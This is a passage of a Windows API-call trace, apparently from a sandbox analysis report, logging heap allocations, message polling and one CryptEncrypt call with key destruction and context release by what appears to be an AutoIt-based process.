(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0180.520] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0180.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0180.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.521] CharLowerBuffW (in: lpsz="byte[82865]", cchLength=0xb | out: lpsz="byte[82865]") returned 0xb [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0180.521] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0180.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0180.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0180.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0180.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0180.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0180.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0180.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.524] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.524] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0180.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0180.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0180.527] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0180.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0180.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0180.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0180.527] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa87778*, pdwDataLen=0x87e820*=0x143af, dwBufLen=0x143b0 | out: pbData=0xa87778*, pdwDataLen=0x87e820*=0x143b0) returned 1 [0180.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0180.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0180.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0180.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0180.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0180.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0180.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0180.528] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0180.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0180.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0180.528] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.528] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0180.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0180.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0180.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0180.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0180.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0180.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0180.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0180.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0180.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0180.531] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.531] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0180.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0180.531] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0180.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0180.532] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0180.532] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0180.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.532] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0180.532] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0180.532] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0180.532] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0180.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.532] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.532] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0180.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0180.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0180.532] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.532] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0180.532] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0180.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0180.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0180.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0180.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0180.542] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0180.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0180.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0180.543] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.543] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0180.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0180.552] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.552] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0180.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.552] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0180.553] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0180.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0180.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0180.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0180.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0180.553] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.553] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0180.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0180.553] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0180.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0180.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0180.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0180.553] CryptDestroyKey (hKey=0x90aed8) returned 1 [0180.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0180.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0180.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0180.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0180.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0180.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0180.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0180.554] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0180.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0180.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0180.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0180.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0180.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0180.554] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0180.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0180.554] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0180.554] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0180.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0180.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.555] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0180.555] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0180.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0180.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.555] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0180.555] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0180.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0180.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0180.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.555] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.555] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0180.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0180.555] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0180.555] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0180.555] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0180.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0180.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0180.555] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0180.555] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0180.556] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0180.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0180.556] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0180.556] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0180.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.556] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0180.556] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0180.556] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0180.556] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0180.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.556] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.556] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0180.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0180.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0180.556] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0180.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0180.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0180.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0180.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0180.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.557] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0180.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0180.557] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0180.557] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0180.557] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.557] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0180.557] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.557] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0180.557] FreeLibrary (hLibModule=0x74f20000) returned 1 [0180.557] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.557] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.557] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.558] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, 